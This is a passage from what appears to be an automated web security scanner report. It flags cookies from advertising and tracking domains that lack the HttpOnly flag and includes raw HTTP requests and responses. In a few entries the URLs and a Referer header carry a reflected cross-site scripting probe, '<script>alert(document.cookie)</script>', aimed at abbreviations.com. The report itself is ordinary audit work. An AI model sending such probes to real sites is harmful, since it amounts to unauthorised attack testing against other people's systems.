Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.533. http://pc3.yumenetworks.com/dynamic_btx/118_12345 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pc3.yumenetworks.com
Path:	/dynamic_btx/118_12345

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.534. http://people.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.535. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

33e27d3d0725f34a77c307be63476b5b=4f8b70569285b3c4a1fb98ed7e94a635; path=/
currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html; expires=Tue, 25-Jan-2011 22:47:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.536. http://ping.crowdscience.com/ping.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.537. http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix01.revsci.net
Path:	/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:19:11 GMT; Path=/
rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.538. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
udm_0=MLvv8iMJPj5n556BI9UE1kizmpAJIKPS2xvIWgYgIL9uKluQ8FTWspXP9z4dgc5Tjg+GkX/DBLD8Zrk6ODbszw9SQsj7PZKWy9ABFwmjwFQ0evvUib/yLZvfFBwXjwkM6rO5fK3YxCq96Or8oFRjVVbCdBPtCXzjQQ606TVULA37mJHG25W+jkE7p1jQOeoDDwy2jaZ6Omq9TgPkKnz/2sB0xjf6hRk5jspTBxqt3Samayo0BEhuwOAtLyHa2SAHSFNkdscUfCABv5wWZ69lNy/8E1fEy1c0DItf5p8OFukjcdIonhq1eRb6B48/AILBIc00QM0t7lo3mxTkSaRCHTLwWpI/++sA4FlsayoEUarNExUU14xOuUzXwFMaOQsoKguT4Mqv46Zp+p9aQ4hBJ4x7XfHf1Yit+yw4YwheL7sEc5PCCZWuYBwsPCjjdwfifwIkriRKqwo0hzzpuv/m8IR1NyhxKkuk5UPrz/0VvxhBuaVzKJhwMfvue26gSUOMHdBWtA/j4mN8kgEP9MoS1UlCXJAYq2xvKQHpINvr5HGv5ED0JzYAHaKinjgVdRdZEFJayVgS5+Vn0gT5QbIyKvOAct9TPFNBfNF4KZv6Cd+4q1QE+wyal0pIenFyY1LiESIecDIzguUCGeMMlqS8UOgDOJ0GlaX4I4i0BWA6cWEsvE3p6qa90UVX6zf0f62pK8/yb9lJ2URHr/fWfNNqpVKdEeL/IT/Vw/pEdLjNz3BRFPSMC5AcC6moMFLV9fmvTLWnyTgGS+vrC91TuEpKa5Q5B4/35ZET8T1LQZ4kfDraCwCPKoMcDRlIYdTjJrUN+eQXmdK9qokSlrPjDATn81V5QAgfh7AY63Dn1yl75bX4LJLOke9K9tsmFvJLkDnM6XVaYNZJWpEJJiINpz7cuAE6deDoOnuaZrAt4Hq4ACj0; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.539. http://pix04.revsci.net/D08734/a3/0/3/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a3/0/3/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
udm_0=MLv39VEJKTpn5l6pUNmEWEzMKG45IuEqmBBIfYaUcjeAzuFye+b+KeIZ8tkF3tzTHZ2QnYDrsm8yZEEzQFSlsKuzpFsHJLRmUyNDZGs8wuB7MAYu0WhRql1pFlfdsk0PXv+O8oosstifQ51JPmgHotLWbzVAPUbgeOrkkO3PFrbz4SeQbTrMV1NVyr5r6M8chD02fm3i43pRp1PeI1joJCvmEjHJvn0VFB7vMlWKUsKCVQEP1ZSDsp6oUx57p/nHilXryR9sIPzTsNBUe9eDiBNIYeW+9mECa7M0AjD/Vcz/FnfBt1uOQs2nd+VgcUjnEtuUTfLTvObBcum6WRUbq3oSTGslWvh8JnPTpcb7HQLFtVHEGxjlbI6E8H7KOXctvSU8aAzGUT8RGP0NkftE0oKUTX6Ui5Qk6Hl1aF0840g0DVtmiCpVXnw2+x2wuxwFCh8P1D1qjY2mQfBrSO3ePpH3parBpg8oM4qmDnEEwDanIYsSZegYX4VDOt3SFH1yL8FJSyY3HD6e6GKgaaK9iKgSKCkH5jDhRvXVY+j6iw6+dfp7omioseS6Z03w+GlD0SA+kV5vdt6YJLDpwF04J8zTGDjcVAfhAPgg9zQcY17KDpvKauirxygcT/lZl9NRozklUQk1WvkAfMTZ8eAeU8Y5MHekFBLTY7fsiJiEjya/c9hNv6Jn225zZhDtOWzpvf7pLFR1F3ddCJj+ZLMLCNt2qoiAPtqk3Z2R4TwWOePPMO7t9IW6e5UImrhwl4PObVEr2IHVrmPaPoySb80MJACtSku+nyikHCrJuoa0Onh466k3SaP5pgJj5AN3qQ//qWmAHi6+34jfmmzdq18AmlqUa6Niv6278fTccmM8uni84fSQiSYcLeNq8Us8kQaFNbnoDorAmwCoYryNvncBB/EG++N9eqSyJOLrV+tsIkRyCeSM1oQQXbgCZjLrspisqylDj5c5Rxno4Y2x+Sa2S09kKAD7ph+eqIEKz5wnNvi0WnewN3qmc450pXtZA8Sl439MXUt2iLvyn8j7kYB/8cMNbJQ8xWI=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.540. http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07610/b3/0/3/1003161/657607877.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/
NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:23:12 GMT; Path=/
rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.541. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:44 GMT; Path=/
NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 21:06:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.542. http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K04491/b3/0/3/1003161/978210799.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0nF7gMUllNabyWHIwKccKiSiT8JVGqkXdvodADw8a38eCoBWQc1L0j8gGBbqYfEiHv9TixOAICJTj9AN8OlKWN8hkR8+1Y80oVgvtsBSK5t7gYFDQ9bSOz6oMiNlsdjAwQfD3aMkgw90W7ZIPNn7oXhnfg4eevH/M+zWc1yBKxE40OYOxyw7SA3UrFAKtyZ/SS8kG4o48pYTZKLh93HbktKBoWuKVI=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 22:48:46 GMT; Path=/
Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d62ebce&0&&4d3d03b9&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Mon, 21-Feb-2011 22:48:46 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 24 Jan 2011 22:48:45 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs = ['K04491_10002'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K04491_10002'],'k04491');}

14.543. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1295919347123%3As2.33%3D%2C6693%2C6993%2C4150%2C4793%2C973%2C2502%2C5393%2C; Domain=.33across.com; Expires=Wed, 25-Jan-2012 01:35:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.544. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1295919347; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT
uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Wed, 25-Jan-2012 01:35:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.545. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ENMADqANq0itiBABlQEB8QWB0wCLouLOUu0ZIAwlGDkZLpFKfBprHWMAu5HhAAAAAAKNGx7kD7ENE9koIxchBh-ikQNQxoIgEIUYIAACIAFy5fEEvS4aKSA; expires=Sun, 24-Apr-2011 21:54:47 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.546. http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/p-9dsZX-5zhUuTg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EJEADqANq0itiBABswEB8gWB8wDJ8ePyDKEOsXzTgfglBt0fIAwlGDkZLpFKfBprHWMA6yg89pEAAAAAAo0bHuQPsQ0T2SgjFyEGH6KRA1DGgiAQhRggAAIgAXLl8QSqLCg1opKIKDA; expires=Mon, 25-Apr-2011 03:06:44 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.547. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=4210%3D1%264214%3D1%264894%3D1%264939%3D1%262372%3D1%262190%3D1%262374%3D1%265671%3D1%262399%3D1%263615%3D1; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.rubiconproject.com
rpx=4210%3D8945%2C0%2C1%2C%2C%264214%3D8945%2C0%2C1%2C%2C%264894%3D8945%2C0%2C1%2C%2C%264939%3D8946%2C0%2C1%2C%2C%265671%3D9034%2C0%2C1%2C%2C%262372%3D9034%2C0%2C1%2C%2C%262190%3D9034%2C0%2C1%2C%2C%262374%3D9034%2C0%2C1%2C%2C%262399%3D9257%2C0%2C1%2C%2C%263615%3D9329%2C0%2C1%2C%2C; expires=Thu, 24-Feb-2011 01:35:48 GMT; path=/; domain=.pixel.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.548. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.549. http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 22:03:20 GMT; path=/; domain=r1-ads.ace.advertising.com
C2=ocfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
F1=Bgy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
49004778=_4d3df728,7545040742,772178^924994^87^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 22:03:20 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 22:03:20 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: C2=ocfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: F1=Bgy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: 49004778=_4d3df728,7545040742,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cs
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
